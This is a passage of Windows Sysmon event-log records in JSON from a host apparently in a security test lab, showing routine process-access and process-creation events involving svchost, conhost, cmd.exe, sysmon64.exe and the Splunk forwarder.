C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:44.513","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3511,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:44.513\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:44.513","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3512,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:44.513\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:44.513","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3513,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:44.513\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:44.513","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3514,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:44.513\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-023C-5F25-0000-0010E84F0500}\r\nTargetProcessId: 4732\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:44.513","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-023C-5F25-0000-0010E84F0500}","TargetProcessId":"4732","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3515,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:44.518\r\nProcessGuid: {A837DB8D-023C-5F25-0000-0010A9500500}\r\nProcessId: 4680\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nFileVersion: 8.0.2\r\nDescription: splunk Application\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal check-xml-files --answer-yes --no-prompt \r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3\r\nParentProcessGuid: {A837DB8D-023C-5F25-0000-0010E84F0500}\r\nParentProcessId: 4732\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: C:\\Windows\\system32\\cmd.exe /c \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\" _internal check-xml-files --answer-yes --no-prompt 2>&1","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:48:44.518","ProcessGuid":"{A837DB8D-023C-5F25-0000-0010A9500500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","FileVersion":"8.0.2","Description":"splunk Application","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal check-xml-files --answer-yes --no-prompt ","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3","ParentProcessGuid":"{A837DB8D-023C-5F25-0000-0010E84F0500}","ParentProcessId":"4732","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"C:\\Windows\\system32\\cmd.exe /c \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\" _internal check-xml-files --answer-yes --no-prompt 2&gt;&amp;1","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3516,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:44.513\r\nSourceProcessGUID: {A837DB8D-023C-5F25-0000-0010E84F0500}\r\nSourceProcessId: 4732\r\nSourceThreadId: 4728\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {A837DB8D-023C-5F25-0000-0010A9500500}\r\nTargetProcessId: 4680\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:44.513","SourceProcessGUID":"{A837DB8D-023C-5F25-0000-0010E84F0500}","SourceProcessId":"4732","SourceThreadId":"4728","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{A837DB8D-023C-5F25-0000-0010A9500500}","TargetProcessId":"4680","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3517,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:44.513\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-023C-5F25-0000-0010A9500500}\r\nTargetProcessId: 4680\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:44.513","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-023C-5F25-0000-0010A9500500}","TargetProcessId":"4680","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3518,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:44.513\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:44.513","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3519,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:44.513\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 